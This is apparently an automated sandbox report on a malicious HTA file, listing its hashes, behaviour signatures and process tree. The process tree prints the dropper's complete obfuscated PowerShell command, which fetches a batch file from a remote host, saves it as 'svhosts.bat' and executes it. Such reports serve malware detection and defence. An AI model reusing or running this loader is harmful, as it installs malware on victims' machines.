Analysis

  • max time kernel
    112s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2023 14:22

General

  • Target

    JT_Docs.hta

  • Size

    150KB

  • MD5

    35a9a6433a12fe8fb4ebfa0a16f76f4a

  • SHA1

    63ed3556dbed1ce1446c906b926a621c378bbb62

  • SHA256

    265f353a79c0781e17204623553f5ec3d358315f22b1d85bafc247e89774509e

  • SHA512

    19a9b0c57f800eac64de911b239bdb94dc03d970589a0e90de5640beb84c80dcd907d7bc8bf973f4024ade15fbf7c7475be7ec1ad98dfab72d179694a67dbe93

  • SSDEEP

    1536:EoNuWWs3uWWwhiXHWX9ivXV5W7X3q7y99ZZrrZb7/+9XSXEsbXuiusEdu3SiOb5s:Eo

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\JT_Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vTfah($xQudNzEj, $OFweEKg){[IO.File]::WriteAllBytes($xQudNzEj, $OFweEKg)};function IEtfY($xQudNzEj){if($xQudNzEj.EndsWith((yGQSet @(15626,15680,15688,15688))) -eq $True){Start-Process (yGQSet @(15694,15697,15690,15680,15688,15688,15631,15630,15626,15681,15700,15681)) $xQudNzEj}else{Start-Process $xQudNzEj}};function bZmJux($pVbtIjHBE){$QTuDPuAwz = New-Object (yGQSet @(15658,15681,15696,15626,15667,15681,15678,15647,15688,15685,15681,15690,15696));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OFweEKg = $QTuDPuAwz.DownloadData($pVbtIjHBE);return $OFweEKg};function yGQSet($mSphbW){$TdkvfmoLP=15580;$lmVbKAnzp=$Null;foreach($GsSYfGNP in $mSphbW){$lmVbKAnzp+=[char]($GsSYfGNP-$TdkvfmoLP)};return $lmVbKAnzp};function nRSqmFi(){$CZtjuCtmV = $env:APPDATA + '\';$ryrbnkPg = bZmJux (yGQSet @(15684,15696,15696,15692,15638,15627,15627,15692,15694,15685,15698,15677,15696,15681,15695,15681,15679,15697,15694,15681,15680,15626,15680,15697,15679,15687,15680,15690,15695,15626,15691,15694,15683,15627,15679,15685,15701,15698,15627,15695,15698,15684,15691,15695,15696,15695,15626,15678,15677,15696));$IGRwg = $CZtjuCtmV + 'svhosts.bat';vTfah $IGRwg $ryrbnkPg;IEtfY $IGRwg;;;;}nRSqmFi;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3688

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3688-132-0x0000000000000000-mapping.dmp

  • memory/3688-133-0x0000000004C50000-0x0000000004C86000-memory.dmp

    Filesize

    216KB

  • memory/3688-134-0x00000000052C0000-0x00000000058E8000-memory.dmp

    Filesize

    6.2MB

  • memory/3688-135-0x0000000005950000-0x0000000005972000-memory.dmp

    Filesize

    136KB

  • memory/3688-136-0x0000000005AF0000-0x0000000005B56000-memory.dmp

    Filesize

    408KB

  • memory/3688-137-0x0000000005B60000-0x0000000005BC6000-memory.dmp

    Filesize

    408KB

  • memory/3688-138-0x00000000061D0000-0x00000000061EE000-memory.dmp

    Filesize

    120KB

  • memory/3688-139-0x0000000007850000-0x0000000007ECA000-memory.dmp

    Filesize

    6.5MB

  • memory/3688-140-0x0000000006770000-0x000000000678A000-memory.dmp

    Filesize

    104KB

  • memory/3688-141-0x0000000007730000-0x00000000077C6000-memory.dmp

    Filesize

    600KB

  • memory/3688-142-0x00000000076D0000-0x00000000076F2000-memory.dmp

    Filesize

    136KB

  • memory/3688-143-0x0000000008480000-0x0000000008A24000-memory.dmp

    Filesize

    5.6MB